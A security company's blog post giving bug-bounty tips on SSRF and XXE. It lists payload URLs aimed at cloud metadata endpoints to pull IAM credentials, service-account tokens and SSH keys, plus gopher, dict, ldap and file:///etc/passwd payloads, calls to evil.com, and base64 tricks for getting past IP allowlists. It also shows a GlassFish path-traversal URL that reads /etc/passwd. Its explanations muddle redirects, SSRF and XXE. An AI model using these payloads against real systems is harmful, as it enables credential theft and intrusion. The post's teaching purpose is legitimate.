Top Categories

Spotlight

todayAugust 6, 2020

Blog admin

35000 ZoOM ID’s exposed to internet – one can join meeting without authentication

One of the Security researchers of our company has found a security vulnerability in the Zoom platform where users can join many meetings without any authentication and they are google indexed with many big company giants. We are attaching screenshots for people’s reference. This is purely compromising the privacy of company [...]


Vulnerability Management, Robotically Optimized.™

Static Application Testing (SAST)

Behavioral-Based Threat Detection

Malware Bot Security Management

Find your solution..

by role

DevOps

CISOs

CTOs

Testing & Quality Assurance

by industry

Financial Services

Healthcare

Government

Games

eCommerce

Blockchain

Our partners

True partners are an extension of ourselves. Find a local partner and put the security in your DevOp teams.

Find a partner

Become a partner

Become a partner and provide our cutting edge AI Vulnerability Detection and Reasoning engine to your customers.

Become a partner

XXE+SSRF INJECTION

Blog admin todayJuly 19, 2020 284

Background
share close
  1. Google Dorking is most important tool and sometimes it leads to bigger results sometimes it lead to remote code execution or XXE injection. Let’s check it out, how it gathers the information and leads to XXE injection.

Suppose we are playing with php application and we want to see how many URL’s are containing or how many end points are there, so we can use google dorking and one of the finest examples has been given by pentest tools website.

Let’s talk about Google Dorking:


site:https://www.example.com/ ext:asp

It can be any extension either php or jsp pages. if the results are given like this:

https://www.example.com/example/shore.aspx?url=

Then we can frame our own URL:

like this below:

https://www.example.com/example/shore.aspx?next_url=https://www.example.com/example/shore.aspx?redirect_uri=https://www.example.com/example/shore.aspx?next=

As these all are redirection parameters and if it is redirecting to other sites, then there are greater chances that it will be possibility of XXE injection.

We can query for AWS Instances:

http://169.254.169.254/latest/meta-data/hostname and response can be like this Response: ec2-203-0-113-25.compute-1.amazonaws.com

2. Sometimes you will find always some links which are responsible for pivoting the internal networks. This can be possible with finding endpoints and this is the reason Information Gathering is too much important when finding endpoints. Collect the endpoints and try different parameters, sometimes you will find with different combinations. One of the finest examples I am showing you:

http://pinestreet.com/proxy?redacted=newdomain&p=/jsonpfile.jsonp?token=e23sds2dsdsds220mlsslka02

In the above example, “p” parameter was vulnerable and thought of taking to external source like http://google.com or http://www.yahoo.com and good scenario is that it has redirected to another site. Then let’s try to access the internal resources:

1st scenario:

http://pinestreet.com/proxy?redacted=newdomain&p=http://google.com?token=e23sds2dsdsds220mlsslka02

2nd scenario:


http://pinestreet.com/proxy?redacted=newdomain&p=http://www.yahoo.com?token=e23sds2dsdsds220mlsslka02

3rd scenario:

http://pinestreet.com/proxy?redacted=newdomain&p=ftp:///etc/passwd?token=e23sds2dsdsds220mlsslka02

http://pinestreet.com/proxy?redacted=newdomain&p=ftp:///etc/passwd?token=e23sds2dsdsds220mlsslka02

3. AWS and Google Cloud Instances URL parameters which can be used for pivoting the internal network and this is applicable for redirection parameters as explained in 1st and 2nd step:

http://169.254.169.254/latest/user-data/

http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE

http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance

http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token

http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json

4. Test Cases for different protocols like sftp, gopher, ftp, ldap, http, dict, file:

http://protocolexample.com/example.php?url=ldap://localhost:1337/%0astats%0aquit

http://protocolexample.com/example.php?url=ldaps://localhost:1337/%0astats%0aquit

http://protocolexample.com/example.php?url=ldapi://localhost:1337/%0astats%0aquit

http://protocolexample.com/example.php?url=sftp://evil.com:1337/

http://protocolexample.com/example.php?dict://evil.com:1337/

http://protocolexample.com/example.php?url=file:///etc/passwd

http://protocolexample.com/example.php?url=file:///C:/Windows/win.ini

http://protocolexample.com/example.php?url=tftp://evil.com:1337/testpacket

http://protocolexample.com/example.php?url=gopher://localhost:1337/%0astats%0aquit

5. For XXE Injection or SSRF technique, Using the base64 encoded scheme or other encoded scheme which can help to bypass the IP whitelisting techniques.

Suppose, lets take an example: http://www.example.com:9999/proxy.php?url=aHR0cDovL3d3dsdwwsWXSdssdsWcy5jb20vc2l0ZS9jb250ZW50L3BhY21hbg==

So, whatever URL parameters we have it, which is coming after url=base64encodedscheme, we can encode the http://127.0.0.1:8080 to base64 encoded value as aHR0cDovLzEyNy4wLjAuMTo4MA==

Try with different ports like:

http://127.0.0.1:443

http://127.0.0.1:22

http://127.0.0.1:25

http://127.0.0.1:21

and make sure that it should get converted into base64 encoded scheme or other encoded schemes.

6. Sometimes you come up with scenarios that nothing works like trying with different protocols and ports. Frustration always increases when different scenarios are not played in proper way and security researcher has tried even with all encoded schemes.

But one thing always comes into mind that try to do more information gathering and more source code reviews from view source code console and check what frameworks they are using it. One security researcher had already put his finding for CMS framework vulnerability and they were using GlassFish server of Oracle products. Now he started searching for exploits in exploit-db and he got something good. Later he find the exploit under “https://www.exploit-db.com/exploits/39241/” and pasted in below URL:

https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://127.0.0.1:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

He can able to successfully read the passwd contents.

For all efforts, it is required to read source code and what type of CMS they are using it.

Written by: admin

Rate it
Previous post

todayJuly 10, 2020

  • 273
close

Blog admin

BUG Bounty TIps : PART ONE

Here are some bug bounty tips for security researchers and bug bounty hunters which can help them to crack bounties in easy manner: BUG BOUNTY TIP A: BUG BOUNTY TIP ...


Similar posts

Post comments (0)

Leave a reply

Your email address will not be published. Required fields are marked *


ABOUT US



Intelligent & Continuous Security Improvement with advanced ML.



CONTACT US